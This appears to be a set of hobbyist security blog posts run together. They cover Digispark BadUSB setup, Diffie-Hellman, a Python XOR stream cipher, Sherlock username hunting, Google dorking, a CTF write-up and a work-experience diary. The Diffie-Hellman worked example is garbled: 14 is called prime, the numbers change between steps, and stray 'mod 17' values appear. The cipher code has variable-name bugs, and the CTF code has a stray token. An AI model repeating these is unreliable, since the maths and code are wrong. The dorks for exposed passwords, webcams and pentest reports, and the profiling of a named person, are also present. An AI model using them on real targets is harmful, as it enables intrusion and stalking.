Unzip and install the file DPInst64.exe

3. Add the Digispark Board Support Package

Open up the Arduino IDE

Open up Files ---> Preferences

Add the below text to the "Additional Boards Managers URLs:"

http://digistump.com/package_digistump_index.json

4. Add the Digispark Board

Open up Tools ---> Board ---> Board Manager

Search up Digispark and click on the install button.

5. Create scripts

If you don't want to create any of your own scripts, their is a whole github reposistory dedicated to premade scripts. You can find it here.

If you want to create an scripts, I recommend using Ducky Script and then converting it to Arduino code using d4n5h's Ducky to Arduino converter. It is far simpler then writing it directly in Arduino code. You can find the syntax of Ducky script here.

Below is an example of converting Ducky Script to Arduino code.

Note: There is a problem with the converter where DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT, KEY_R); should be DigiKeyboard.sendKeyStroke(MOD_GUI_LEFT, KEY_R)

6. Upload your script

Click on the upload button.

When the console says "plug in the device now", insert your ATTINY85 into your USB port.

Ending Notes

I hope you enjoyed this article about the ATTINY85. If you have any questions you can always leave a comment below or feel free to reach out to me on Twitter at @dingo418.

Sources

$1 BadUSB - DigiSpark Drive By HID Tutorial

Run USB Rubber Ducky Scripts on a Super Inexpensive Digispark Board

The Diffie-Hellman key exchange was created in the 70s by Whitfield Diffie and Martin e. Hellman in this landmark paper. It was the first known public-private key cryptography known to the public. RSA was created before the Diffie-Hellman key exchange between 1969 and 1973 by James Ellis, Clifford Cox and Malcolm Williamson but it was classified by Government Communication Headquarters (GCHQ), a UK intelligence agency. Now, the Diffie-Hellman key exchange is so successful it was even used to connect to this website.

How does the Diffie-Hellman key exchange work?

The Diffie-Hellman key exchange uses a lot of math, so let's start by using colour.

Credit: What is the Diffie–Hellman key exchange and how does it work?, Josh Lake

Alice and Bob both decide on a predetermined common paint. In this case, it is yellow. They each choose an additional secret colour that they don't show anyone else. Alice chooses red and Bob chooses green.

Now they mix the predetermined common paint and their secret colour. in this case, the predetermined common paint colour is yellow. Alice will mix yellow and red which will produce a light orange. Bob will mix yellow and green which will produce a light blue.

Bob and Alice now share their mixed colours to each other. Alice will share her colour of light orange to Bob. Bob will share his mixed colour of light blue to Alice.

Finally, you mix the other person's shared colour and your own secret colour. Both Alice and Bob will have the remaining colour brown. The important part of this exchange is that the colour brown is only known to Alice and Bob. In the Diffie–Hellman key exchange the colour brown would be your secret key. You could use this key for algorithms such as DES or AES. Before looking into the mathematical concept, you need a clear understanding of the above concept.

How Diffie-Hellman key exchange works mathematically.

I will be explaining the most basic mathematical version of the key exchange in this section.

Before getting started with the Diffie-Hellman key exchange. We must first publicly decide on two numbers that will be publicly known. We need a prime (p) number and a base (g). The base (g) can be any number smaller than the p. In this case p = 14 and g = 6.

Now, Alice and Bob have to decide on a secret individual number that only they will know. In this case, Alice will choose 6 while Bob will choose 4.

a=6
b=4

We then must put these numbers threw a one-way function. This means that it is easy to calculate but incredibly hard to reverse. One way functions use modulus arithmetic. If you do not know what modulus arithmetic is Computer Hope has a good explanation but essentially it is the remainder division we did as kids. Modulus just takes the remainder, so 11 mod 4 = 3.

Alice will get A by using this one way functionA = g<sup>a</sup> mod p .

A = g<sup>a</sup> mod p
A = 6<sup>5</sup> mod 14
A = 7776 mod 14
A = 5

Bob will get B by using this one way function B = g<sup>b</sup> mod p.

B = g<sup>b</sup> mod p
B = 7<sup>4</sup> mod 14
B = 2401 mod 14
B = 6

Alice will now send her number A to Bob and Bob will send his number B to Alice. A and B will be publicly known. Now both parties will be able to calculate their shared secret.

Alice will calculate the secret by using the formula s = B<sup>a</sup> mod p.

s = A<sup>b</sup> mod p
s = 5<sup>7</sup> mod 14
s = 78,125  mod 17
s = 5

Bob will similarly calculate the secret. He will use s = A<sup>b</sup> mod p.

s = B<sup>a</sup> mod p|
s = 6<sup>5</sup> mod 14|
s = 7776 mod 17|
s = 5

Now they both have the shared secret of s = 5. Any would-be attacker that intercepted the shared would struggle to figure out s using the available information of A, B, g and p.

Below is a table that outlines the whole process.

This is a very weak version of the Diffie-Hellman key exchange as we are using a very small number. Prime (p) should at the very least be 2048 bits long. It also suffers from a lack of authentication, meaning anyone could be Bob.

Below is an example of a 2048-bit long number.

# a 2048-bit long number
1994641991657874238432584134916742769831626498728552748641213829416447744326318497317853615112452218299162248281941591219232629183284639871598555636789761746149615517811395589398861114178718851749455442924736594729825457397846951983358839924883789411234344

Ending Notes

If you are still interested and want to know more comparitech has a really good article.

I hope you enjoyed this article about the Diffie-Hellman exchange. If you have any questions you can always leave a comment below or feel free to reach out to me on Twitter at @dingo418.

Sources

What is the Diffie–Hellman key exchange and how does it work?

Diffie Hellman Algorithm

Symmetric encryption is a type of encryption that uses a singular key for both decrypting and encrypting text. This is different compared to asymmetric encryption which requires a public and private key. If two entities want to safely communicate via symmetric encryption, they must safely exchange the key. This is easier said than done, and there is a variety of ways to do this. Some examples would be the Diffie–Hellman key exchange or threw Asymmetric encryption. Sadly, this is out of scope for this article.

Types of Encryption

Symmetric Algorithms fall into two main categories: Block and Stream Ciphers.

Block Ciphers

Block Ciphers encrypt plaintext by splitting text up into blocks of data (usually 64, 128 or 256 bits). Each of these blocks is processed by several mathematical functions. These blocks can be chained together to provide stronger encryption. Block Ciphers will return a ciphertext that is the same length as the plaintext. If the block of data is smaller than the desired block size, then it will be padded with null data, generally 0's, to reach the desired block size. To decrypt a Block Cipher the inverse functions of the function that encrypted the ciphertext must be used. Block Ciphers are far more secure than Stream Ciphers. They are also far more complicated than Stream Ciphers.

Credit: Tutorialspoint, Block Cipher

Positives:

• Very Secure
• Reverse engineering is harder
• Easy to make tweaks to the algorithm

Negatives:

• Relatively Slow
• Longer keys

Stream Ciphers:

Stream Ciphers encrypt the plaintext one byte at a time. This algorithm supports any key size. The key size greatly affects the security of the encryption. Compared to Block Ciphers, Steam ciphers are relatively simple and fast. Common Stream algorithms used are Salsa20, RC4, CSS and one-time-pads. Most of these encryption methods have been found to have multiple vulnerabilities which render them insecure. This is why you will not see Stream Ciphers used in modern software.

Although Stream Ciphers have a lot of vulnerabilities, they have the mathematically strongest algorithm. It is called a 'one-time pad', where you generate a random key with the same length as the message and only use it once. Although, this is impractical and inefficient in general use.

Positives:

• Fast
• Any size key
• Simple to understand

Negatives:

• Very insecure

Below is an example of a stream cipher using the XOR operation Credit: Geeks for Geeks, Difference between Block Cipher and Stream Cipher

Stream Cipher Example in Python

Below will be an explanation of the key parts of the code. This is not a secure implementation of a stream cipher. This is a simple implementation of a stream cipher. If you want to see a more secure implementation, see RC4 in Python.

Encryption

The code below goes through the given variable text one character at a time. Using the ord() function we get the integer representation of the letter and the "keyling". The "keyling" is the corresponding character from the key. An easy way to encrypt a character is using the XOR function. This is represented in python by the ^ character. The ciphertext would then be converted back into a Unicode character by the chr() function. This would then be added to the ciphertexts variable. After encrypting the given text, it will write it to ciphertext.txt. This is done as some Unicode characters act weird when copied.

def encrypt(text, key):
    ciphertexts = ""
    with open("ciphertext.txt", "w") as f:
        for num,letter in enumerate(text):
            # Acessing 1 byte from the key. It repeats if the key is shorter
            keyling = key[num % len(key)]
            # Uses the XOR operation to encrypt it. ^ is XOR
            ciphertexts += chr(ord(letter) ^ ord(keyling))
        # Has to be written to a file. Clipboard does not work
        f.write(ciphertext)

Decryption

Below is the decryption part of the code. It goes through the text file one character at a time. Using the ord() function we get the integer representation of that letter and the keyling. To reverse the encryption we must know the inverse calculation of XOR. The inverse calculation of an XOR is an XOR. Each character is encrypted with the "keyling" using the XOR function. It is then finally added to the plaintext variable.

def decrypt(key):
    plaintext = ""
    with open("ciphertext.txt", "r") as f:
        for num,letter in enumerate(f.read()):
            # Acessing 1 byte from the key. It repeats if the key is shorter then the text
            keyling = key[num % len(key)]
            # The inverse of XOR is XOR. ^ is XOR
            plaintext += chr(ord(letter) ^ ord(keyling))
        return plaintext

The Full Code

Below contains a basic user interface to decrypt or encrypt using a Stream Cipher implementation.

def decrypt(key):
    plaintext = ""
    with open("ciphertext.txt", "r") as f:
        for num,letter in enumerate(f.read()):
            # Acessing 1 byte from the key. It repeats if the key is shorter
            keyling = key[num % len(key)]
            # The inverse of XOR is XOR. ^ is XOR
            plaintext += chr(ord(letter) ^ ord(keyling))
        return plaintext
def encrypt(text, key):
    ciphertext = ""
    with open("ciphertext.txt", "w") as f:
        for num,letter in enumerate(text):
            # Acessing 1 byte from the key. It repeats if the key is shorter
            keyling = key[num % len(key)]
            # Uses the XOR operation to encrypt it. ^ is XOR
            ciphertexts += chr(ord(letter) ^ ord(keyling))
        # Has to be written to a file. Clipboard does not work
        f.write(ciphertexts)


def main():
    while True:
        option = input("Do you want to encrypt or decrypt: ")
        key = input("Please enter your key: ")
        if option == "encrypt":
            text = input("Enter your desired text: ")
            encrypt(text, key)
            print("Your ciphertext is in file ciphertext.txt")
        else:
            print("Your plaintext is: ",decrypt(key))

    exit()

if __name__ == "__main__":
    main()

Closing Notes

Symmetrical Encryption is a massively complicated topic. Block ciphers are more secure but a lot more complicated. It deserves its own article. The above code can be found here on my Github.

I hope you enjoyed this article about symmetrical encryption. If you have any questions you can always leave a comment below or feel free to reach out to me on Twitter @dingo418.

Credits:

Video: Block Cipher Vs Stream Cipher - Cryptography - Cyber Security - CSE4003 Cryptology 101: Block Cipher Modes of Operation with Python examplez

Installation

To install Sherlock, follow the instructions below. Make sure that you have Python3-pip and Python 3.6 or above installed. You can find Sherlock's github here.

On all platforms
~$ git clone https://github.com/sherlock-project/sherlock.git
~$ cd sherlock
~/sherlock$ pip3 install -r requirements.txt

# On Linux
~$ sudo apt install sherlock

Once installed, you can run Sherlock by python3 sherlock.py -h.

~$ python3 sherlock.py -h                                                 
usage: sherlock [-h] [--version] [--verbose] [--folderoutput FOLDEROUTPUT] [--output OUTPUT] [--tor] [--unique-tor] [--csv] [--site SITE_NAME] [--proxy PROXY_URL] [--json JSON_FILE] [--timeout TIMEOUT] [--print-all] [--print-found]
                [--no-color] [--browse] [--local]
                USERNAMES [USERNAMES ...]

Sherlock: Find Usernames Across Social Networks (Version 0.14.0)

positional arguments:
  USERNAMES             One or more usernames to check with social networks.

options:
  -h, --help            show this help message and exit
  --version             Display version information and dependencies.
  --verbose, -v, -d, --debug
                        Display extra debugging information and metrics.
  --folderoutput FOLDEROUTPUT, -fo FOLDEROUTPUT
                        If using multiple usernames, the output of the results will be saved to this folder.
  --output OUTPUT, -o OUTPUT
                        If using single username, the output of the result will be saved to this file.
  --tor, -t             Make requests over Tor; increases runtime; requires Tor to be installed and in system path.
  --unique-tor, -u      Make requests over Tor with new Tor circuit after each request; increases runtime; requires Tor to be installed and in system path.
  --csv                 Create Comma-Separated Values (CSV) File.
  --site SITE_NAME      Limit analysis to just the listed sites. Add multiple options to specify more than one site.
  --proxy PROXY_URL, -p PROXY_URL
                        Make requests over a proxy. e.g. socks5://127.0.0.1:1080
  --json JSON_FILE, -j JSON_FILE
                        Load data from a JSON file or an online, valid, JSON file.
  --timeout TIMEOUT     Time (in seconds) to wait for response to requests. Default timeout is infinity. A longer timeout will be more likely to get results from slow sites. On the other hand, this may cause a long delay to gather
                        all results.
  --print-all           Output sites where the username was not found.
  --print-found         Output sites where the username was found.
  --no-color            Don't color terminal output
  --browse, -b          Browse to all results on default browser.
  --local, -l           Force the use of the local data.json file.

You can see that their is many useful options. Notably tor and the proxy flag.

If you installed it using the apt method; all you have to do is type sherlock.

~$ sherlock dingo418
[*] Checking username dingo418 on:
[+] Coil: https://coil.com/u/dingo418
[+] Fiverr: https://www.fiverr.com/dingo418
[+] GitHub: https://www.github.com/dingo418
[+] HackerOne: https://hackerone.com/dingo418
[+] Minecraft: https://api.mojang.com/users/profiles/minecraft/dingo418
[+] PCPartPicker: https://pcpartpicker.com/user/dingo418
[+] Pinterest: https://www.pinterest.com/dingo418/
[+] Scratch: https://scratch.mit.edu/users/dingo418
[+] TikTok: https://tiktok.com/@dingo418
[+] TradingView: https://www.tradingview.com/u/dingo418/
[+] Zhihu: https://www.zhihu.com/people/dingo418
[+] eBay.com: https://www.ebay.com/usr/dingo418
[+] eBay.de: https://www.ebay.de/usr/dingo418

Hunt down accounts

Now all you have to do is choose your target. In this example i have chosen BobSege. The --timeout 10 flag forces Sherlock to skip a website after 10 seconds of no response. I always recommend to add it on.

~$ python3 sherlock.py bobseger --timeout 10
[+] 9GAG: https://www.9gag.com/u/bobseger
[+] Academia.edu: https://independent.academia.edu/bobseger
[+] Apple Developer: https://developer.apple.com/forums/profile/bobseger
[+] Apple Discussions: https://discussions.apple.com/profile/bobseger
[+] Archive.org: https://archive.org/details/@bobseger
[+] AskFM: https://ask.fm/bobseger
[+] Behance: https://www.behance.net/bobseger
[+] Blogger: https://bobseger.blogspot.com
[+] BodyBuilding: https://bodyspace.bodybuilding.com/bobseger
[+] ChaturBate: https://chaturbate.com/bobseger
[+] Clubhouse: https://www.clubhouse.com/@bobseger
[+] Codecademy: https://www.codecademy.com/profiles/bobseger
[+] Coil: https://coil.com/u/bobseger
[+] DailyMotion: https://www.dailymotion.com/bobseger
[+] DeviantART: https://bobseger.deviantart.com
[+] Discogs: https://www.discogs.com/user/bobseger
[+] Disqus: https://disqus.com/bobseger
[+] Docker Hub: https://hub.docker.com/u/bobseger/
[+] Duolingo: https://www.duolingo.com/profile/bobseger
[+] Facebook: https://www.facebook.com/bobseger
[+] Fiverr: https://www.fiverr.com/bobseger
[+] Flipboard: https://flipboard.com/@bobseger
[+] FortniteTracker: https://fortnitetracker.com/profile/all/bobseger
[+] Freesound: https://freesound.org/people/bobseger/
[+] G2G: https://www.g2g.com/bobseger
[+] GaiaOnline: https://www.gaiaonline.com/profiles/bobseger
[+] Genius (Artists): https://genius.com/artists/bobseger
[+] Giphy: https://giphy.com/bobseger
[+] GitHub: https://www.github.com/bobseger
[+] GoodReads: https://www.goodreads.com/bobseger
[+] Gravatar: http://en.gravatar.com/bobseger
[+] Imgur: https://imgur.com/user/bobseger
[+] Instagram: https://www.instagram.com/bobseger
[+] Issuu: https://issuu.com/bobseger
[+] Kik: https://kik.me/bobseger
[+] Kongregate: https://www.kongregate.com/accounts/bobseger
[+] Linktree: https://linktr.ee/bobseger
[+] Minecraft: https://api.mojang.com/users/profiles/minecraft/bobseger
[+] Munzee: https://www.munzee.com/m/bobseger
[+] MyMiniFactory: https://www.myminifactory.com/users/bobseger
[+] Myspace: https://myspace.com/bobseger
[+] Naver: https://blog.naver.com/bobseger
[+] Newgrounds: https://bobseger.newgrounds.com
[+] PCPartPicker: https://pcpartpicker.com/user/bobseger
[+] Periscope: https://www.periscope.tv/bobseger/
[+] Pinterest: https://www.pinterest.com/bobseger/
[+] Pokemon Showdown: https://pokemonshowdown.com/users/bobseger
[+] Pornhub: https://pornhub.com/users/bobseger
[+] Quizlet: https://quizlet.com/bobseger
[+] Rate Your Music: https://rateyourmusic.com/~bobseger
[+] Redbubble: https://www.redbubble.com/people/bobseger
[+] Reddit: https://www.reddit.com/user/bobseger
[+] ReverbNation: https://www.reverbnation.com/bobseger
[+] Roblox: https://www.roblox.com/user.aspx?username=bobseger
[+] Scratch: https://scratch.mit.edu/users/bobseger
[+] Scribd: https://www.scribd.com/bobseger
[+] SlideShare: https://slideshare.net/bobseger
[+] Smule: https://www.smule.com/bobseger
[+] SoundCloud: https://soundcloud.com/bobseger
[+] Telegram: https://t.me/bobseger
[+] Tenor: https://tenor.com/users/bobseger
[+] TikTok: https://tiktok.com/@bobseger
[+] TradingView: https://www.tradingview.com/u/bobseger/
[+] Trello: https://trello.com/bobseger
[+] Twitch: https://www.twitch.tv/bobseger
[+] Twitter: https://twitter.com/bobseger
[+] VSCO: https://vsco.co/bobseger
[+] Wattpad: https://www.wattpad.com/user/bobseger
[+] Wikipedia: https://en.wikipedia.org/wiki/Special:CentralAuth/bobseger?uselang=qqx
[+] WordPress: https://bobseger.wordpress.com/
[+] Xbox Gamertag: https://xboxgamertag.com/search/bobseger
[+] Xvideos: https://xvideos.com/profiles/bobseger
[+] YouNow: https://www.younow.com/bobseger/
[+] YouPorn: https://youporn.com/uservids/bobseger
[+] Zhihu: https://www.zhihu.com/people/bobseger
[+] eBay.com: https://www.ebay.com/usr/bobseger
[+] eBay.de: https://www.ebay.de/usr/bobseger
[+] jeuxvideo: http://www.jeuxvideo.com/profil/bobseger?mode=infos
[+] last.fm: https://last.fm/user/bobseger
[+] mercadolivre: https://www.mercadolivre.com.br/perfil/bobseger
[+] xHamster: https://xhamster.com/users/bobseger

You can find out a lot about your target. In addition, Sherlock also lets you search multiple usernames at once by simply adding a space to your search like below.

~$ python3 sherlock.py dingo dingoo --timeout 10

Useful flags

There is a few other useful flags contained in Sherlock. Here are a couple:

Proxy (-p)

-p allows you to specify a proxy. The proxy has to be in the syntax of -p [TYPE-OF-PROXY]://[IP]:[PORT]. An example is below:

~$ python3 sherlock.py bobseger --timeout 10 -p socks5://127.0.0.1:1080

Tor (-t)

-t allows you to run Sherlock over tor. You will need to be running tor on your current machine and have it added to your system path.

~$ python3 sherlock.py bobseger --timeout 10 -t

Output (-o)

-o allows you to specify an output file for all the positive sites.

~$ python3 sherlock.py dingo418 --timeout 10 -o dingo418.txt
~$ cat dingo418.txt
https://coil.com/u/dingo418
https://www.fiverr.com/dingo418
https://www.github.com/dingo418
https://hackerone.com/dingo418
https://api.mojang.com/users/profiles/minecraft/dingo418
https://pcpartpicker.com/user/dingo418
https://www.pinterest.com/dingo418/
https://scratch.mit.edu/users/dingo418
https://tiktok.com/@dingo418
https://www.tradingview.com/u/dingo418/
https://twitter.com/dingo418
https://www.zhihu.com/people/dingo418
https://www.ebay.com/usr/dingo418
https://www.ebay.de/usr/dingo418

Browser (-b)

-b allows you to automatically open up all the results onto your default browser

~$ python3 sherlock.py bobseger --timeout 10 -b

Ending Notes

Sherlock is a very powerful OSINT tool that is a lot of fun to play around with. You can find a lot about a person

I hope you enjoyed this guide for Sherlock for find social media accounts. If you have any questions you can always leave a comment below or feel free to reach out to me on Twitter @dingo418.

Google Dorking is when you use Google search queries to gain access to hidden information on websites. Some of this information google was not meant to index. This can be things such as log files, passwords, ssh-keys, etc. Google Dorking is a useful skill everyone should know.

How does it work

Before we get into Google Dorking we need first to understand how Google works. This article talks about how search engines work, but here is a quick run down.

Google sends out bots to a bunch of different websites. It indexes everything on the website it is allowed. Using specific search queries on Google you can get that hidden information.

Legal Note

Google Dorking is not illegal along as you don't log in to pages. As soon as you try to log in to a protected page then it becomes illegal and you can get into serious trouble. Always check your local laws.

Furthermore, I would always recommend a VPN when Dorking just as an extra set of protection. You don't need it but it is always good to use. Also, be careful about what you click on, as the stuff you see may not be family-friendly.

Google Dorking

This is a very simple example of what a Google Dork would be:

site:hashnode.com filetype:pdf

Google will search https://hashnode.com for all PDF files hosted under that domain name. And as you see below it comes up with a bunch of interesting results

I am just going to dump a bunch of useful syntaxes you can go refer to. If you want to see a larger list go here.

Advanced searches

These are some fun advanced searches.

Finding passwords

There are lots of different queries for passwords but here is a couple:

password filetype:doc | filetype:docx | filetype:pdf | filetype:xls site:Your site

"admin_password" ext:txt | ext:log | ext:cfg

filetype:log intext:password after:2016 intext:@gmail.com | @yahoo.com | @hotmail.com

Finding Webcams

There are many dorks to find webcams around the world. Here are a few:

inurl:"view.shtml" "Network Camera"

"Camera Live Image" inurl:"guestimage.html"
alt_text

intitle:”webcamXP 5”

An example of what you can get is:

Penetration Test Documents

Now, this is my favourite one. Why bother doing recon when you can get someone elses work:

intitle: "report" ("qualys" | "nessus" | |acunetix" | "netsparker" | "nmap") filetype:pdf

An example of what you can get is:

Other

Bellow is a collection of dorks. Try them out yourselves. If you want even more their is a ton on exploit-db

Sources:

https://tryhackme.com/room/googledorking

https://www.boxpiper.com/posts/google-dork-list

https://moz.com/beginners-guide-to-seo/how-search-engines-operate

https://null-byte.wonderhowto.com/how-to/find-passwords-exposed-log-files-with-google-dorks-0198557/

If you do not have the below knowledge, you will not understand the solution.

• You need a good understanding of binary.
• You need to understand logic gates.
• You need to be able to read code.
• You need to understand bitwise functions

Recon:

When we extract the zip files we get two files, "pico.uf2" and "chal.c". A quick google tells us that the "pico.uf2" is a firmware file for the Raspberry Pi Pico. Although I would love to play around with it, I do not have a Raspberry PI Pico. We can also tell that "chal.c" is a c file. We can assume that the "pico.uf2" is a compiled version of "chal.c".

Understanding the code:

"chal.c" has the below code in it.

#include <stdbool.h>

#include "hardware/gpio.h"
#include "hardware/structs/sio.h"
#include "pico/stdlib.h" 

int main(void)
{
    for (int i = 0; i < 8; i++) {
        gpio_init(i); 
        gpio_set_dir(i, GPIO_OUT); 
    }
    gpio_put_all(0);

    for (;;) {
        gpio_set_mask(67);
        gpio_clr_mask(0);
        sleep_us(100);
        gpio_set_mask(20);
        gpio_clr_mask(3);
        sleep_us(100);
        gpio_set_mask(2);
        gpio_clr_mask(16);
        sleep_us(100);
        etc..
        etc..

Breaking the code apart

Let's break apart this code bit by bit.

#include

#include <stdbool.h>
#include "hardware/gpio.h"
#include "hardware/structs/sio.h"
#include "pico/stdlib.h"

The above code is the standard way of including libraries or user-made code. We do not need these libraries downloaded.

The binary number initiator

    for (int i = 0; i < 8; i++) { // loops 7 times and intialises gpio pin 0-7
        gpio_init(I);  // Initialise a GPIO Pin i
        gpio_set_dir(i, GPIO_OUT);  //Set's the GPIO pin as OUPUT
    }
    gpio_put_all(0);  //Set's all the pins to 0

The above code initialises an 8-bit binary number from GPIO pin 0-7. All these GPIO pins are set to output only. Their default values are all set to 0 by default.

The encoded message

for (;;) {// for (;;) means it goes forever
        gpio_set_mask(67);
        gpio_clr_mask(0);
        sleep_us(100);
        gpio_set_mask(20);
        gpio_clr_mask(3);
        sleep_us(100);
        gpio_set_mask(2);
        gpio_clr_mask(16);
        sleep_us(100);
        etc..
        etc..

We can guess that the "gpio_set_mask" and "gpio_clr_mask" are the functions that are generating a binary number. The "sleep_us" function is most likely a pause for us to read the binary output. We can then assume that the binary output is a number for a Unicode character.

This is where the real challenge is. In this code, we have 3 functions: "gpio_set_mask", "gpio_clr_mask" and "sleep_us".

Function sleep_us

The "sleep_us" function makes the code pause for a certain amount of milliseconds.

Funcition gpio_set_mask

According to the documentation, "gpio_set_mask" does "Drive high every GPIO appearing in the mask." Let's break this down. This is when bitwise functions come into play. "Drive high" means turning the pin on/1. "GPIO" refers to the 8-bit binary number we created earlier. "Mask" defines what bits you want to clear or put in.

Note: The mask gets turned into a binary number before any operation occurs. This is when bitwise functions come in. We can deduce that the above description is for the bitwise function of "OR". An example is given below:

Function gpio_clr_mask

According to the documentation, "gpio_clr_mask" does "Drive low every GPIO appearing in the mask." Let's once again break this down. "Drive low" means turn off or set to 0. "GPIO" refers to the 8-bit binary number we created early. "Mask" defines what bits you want to clear or put in.

We can deduce from this statement that the two required bitwise functions are GPIO "AND" "NOT" MASK. An example is given below where MASK equals 87 and the original value is 24.

This is a table for the "NOT" function

This Inverted BITMASK is the output of the above bitwise function. This is a table for "AND".

Solutions

Syntax

Before we code the solution we need to know the syntax for bitmask operations in python.

SOURCE: geeksfromgeeks

The Code

Now we can code the solution. I am writing up this solution in Python because it is easy. First off you can just paste the encoded message in as it is perfectly fine Python syntax.

...
gpio_set_mask(67);
gpio_clr_mask(0);
sleep_us(100);
gpio_set_mask(20);
gpio_clr_mask(3);
sleep_us(100);
gpio_set_mask(2);
gpio_clr_mask(16);
sleep_us(100);
etc..
etc..

Now we need to create the 3 separate functions. In the "gpio_set_mask" function, all we need to do is create a function that does the bitmask operation of "OR" between gpio and the mask. The Python syntax for "OR" is "|".

gpio = 0
def gpio_set_mask(m):
    global gpio
    gpio |= m
...

In the gpio_clr_mask function, we need to use the bitmask function of GPIO AND NOT M. This can be done in python with the & and ~ representing AND and NOT respectively.

...
def gpio_clr_mask(m):
    global gpio
    gpio &= ~m
...

For the sleep_us function, all we need to do is print out the letter output of the binary GPIO.

def sleep_us(_):
    print(chr(gpio), end="")

Putting this all together we get the python code.

gpio = 0

def gpio_clr_mask(m):
    global gpio
    gpio &= ~m
def gpio_set_mask(m):
    global gpio
    gpio |= m
def sleep_us(_):
    print(chr(gpio), end="")


gpio_set_mask(67);
gpio_clr_mask(0);
sleep_us(100);
gpio_set_mask(20);
gpio_clr_mask(3);
sleep_us(100);
gpio_set_mask(2);
gpio_clr_mask(16);
sleep_us(100);
gpio_set_mask(57);
gpio_clr_mask(4);
sleep_us(100);
gpio_set_mask(0);
gpio_clr_mask(25);
sleep_us(100);
gpio_set_mask(5);
gpio_clr_mask(2);
sleep_us(100);
gpio_set_mask(18);
gpio_clr_mask(65);
sleep_us(100);
gpio_set_mask(1);
gpio_clr_mask(2);
sleep_us(100);
gpio_set_mask(64);
gpio_clr_mask(17);
sleep_us(100);
gpio_set_mask(2);
gpio_clr_mask(0);
sleep_us(100);
gpio_set_mask(1);
gpio_clr_mask(6);
sleep_us(100);
gpio_set_mask(18);
gpio_clr_mask(65);THING
sleep_us(100);
gpio_set_mask(1);
gpio_clr_mask(0);
sleep_us(100);
gpio_set_mask(4);
gpio_clr_mask(2);
sleep_us(100);
gpio_set_mask(0);
gpio_clr_mask(0);
sleep_us(100);
gpio_set_mask(64);
gpio_clr_mask(16);
sleep_us(100);
gpio_set_mask(16);
gpio_clr_mask(64);
sleep_us(100);
gpio_set_mask(2);
gpio_clr_mask(4);
sleep_us(100);
gpio_set_mask(0);
gpio_clr_mask(3);
sleep_us(100);
gpio_set_mask(9);
gpio_clr_mask(0);
sleep_us(100);
gpio_set_mask(0);
gpio_clr_mask(1);
sleep_us(100);
gpio_set_mask(0);
gpio_clr_mask(8);
sleep_us(100);
gpio_set_mask(8);
gpio_clr_mask(0);
sleep_us(100);
gpio_set_mask(65);
gpio_clr_mask(24);
sleep_us(100);
gpio_set_mask(22);
gpio_clr_mask(64);
sleep_us(100);
gpio_set_mask(0);
gpio_clr_mask(0);
sleep_us(100);
gpio_set_mask(0);
gpio_clr_mask(5);
sleep_us(100);
gpio_set_mask(0);
gpio_clr_mask(2);
sleep_us(100);
gpio_set_mask(65);
gpio_clr_mask(16);
sleep_us(100);
gpio_set_mask(22);
gpio_clr_mask(65);
sleep_us(100);
gpio_set_mask(1);
gpio_clr_mask(6);
sleep_us(100);
gpio_set_mask(4);
gpio_clr_mask(0);
sleep_us(100);
gpio_set_mask(66);
gpio_clr_mask(21);
sleep_us(100);
gpio_set_mask(1);
gpio_clr_mask(0);
sleep_us(100);
gpio_set_mask(0);
gpio_clr_mask(2);
sleep_us(100);
gpio_set_mask(24);
gpio_clr_mask(65);
sleep_us(100);
gpio_set_mask(67);
gpio_clr_mask(24);
sleep_us(100);
gpio_set_mask(24);
gpio_clr_mask(67);
sleep_us(100);
gpio_set_mask(2);
gpio_clr_mask(8);
sleep_us(100);
gpio_set_mask(65);
gpio_clr_mask(18);
sleep_us(100);
gpio_set_mask(16);
gpio_clr_mask(64);
sleep_us(100);
gpio_set_mask(2);
gpio_clr_mask(0);
sleep_us(100);
gpio_set_mask(68);
gpio_clr_mask(19);
sleep_us(100);
gpio_set_mask(19);
gpio_clr_mask(64);
sleep_us(100);
gpio_set_mask(72);
gpio_clr_mask(2);
sleep_us(100);
gpio_set_mask(2);
gpio_clr_mask(117);
sleep_us(100);

CTF Flag

Closing notes

If you want to try this out yourself go here.

If you want to see an expanded version of the python script go here.

If you want to see all the files in the task go here.

If you want to see some of the other writeups for Google Beginner CTF go here.

• Write a blog every day for a week
• Learn as much as possible about the cyber security Industry.

I believe I completed the first goal very well. I have managed to blog every day for a week with high-quality blogs. Although it was tiring; I have managed to learn a lot about the tools for cyber security.

The second goal about learning more about the cyber security industry. I broke the goal up into a couple of smaller goals. They are:

• What kind of jobs are there in the cyber security
• What are the pathways to cyber security.
• What is the work like. For the second goal, I am going to take you threw the highlights of the week from Monday to Friday.

Monday

Monday was an exciting day. The first day of work experience! This day mainly contained talking to some Security Operation Centre Analysts. I am not completely sure about who and what I am allowed to talk about, so I apologise if I am a bit vague. But first a bit of background. What is a security Operation Centre Analyst(SOC Analyst)? They are a part of the defence of a system where they combat people trying to hack into a network or system. Using software, such as Logarithm and Microsoft Sentential, machines and servers send Gb's worth of logs to the Security Operation Centre. These systems will then filter out all the useless logs and give the SOC analysts events that are suspicious. If the SOC Analyst looks at events and thinks it is an attack, they will try to mitigate the outbreak as much as possible by shutting down servers and systems to stop the spread. On a general day of working, they will be sifting threw events to see if there is anything suspicious. When they aren't looking at events they will be creating or improving rules to reduce the number of events they are given.

What did we talk about?

I learned a lot about the daily tasks of a SOC analyst. I was able to see how the Microsoft Sentential and LogRhythm worked and some of their detection rules. Sadly, I wasn't allowed to see the tools in action as there was a lot of client confidentiality. In addition, I got to see some of the other services they were working on like their vulnerability bulletin. This is a bulletin that they send out once or twice a week to their clients about recent vulnerabilities or hacker groups.

What did I learn?

I learned a lot from this day as it was my first time learning about SOC Analysts and what they do. I got a feel for what they do and was shown some of the tools they used. I never really considered becoming a SOC Analyst as I never really knew enough about it. But I will consider this in the future.

Tuesday

On the second day, I got the chance to talk to the Director of Security Services at Kinetic IT and another SOC Analysts threw a video call.

What did we talk about? (Director of Security Services)

Talking to the Director of Security Services was incredibly valuable. She talked a lot about how important networks such as LinkedIn are to get jobs. She also said gaining extra qualifications like pentest+ or OSCAP was a must. An important thing that she said that stuck with me is, that if you want somebody else's job, look at their Linkedin and look at what experience and qualifications they have. Then copy them. I was also shown what a report looked like for a penetration test. It was a valuable insight into what they would give the board of a company.

What did I learn?

I learnt the value of Linkedin. Not only showcasing your abilities but being able to gain connections threw LinkedIn is incredibly valuable. I will be making a Linkedin very soon. I will post frequently there. Once I get enough experience I will definitely go for some qualifications like penteast+ or OSCAP.

What did we talk about? (SOC Analysts)

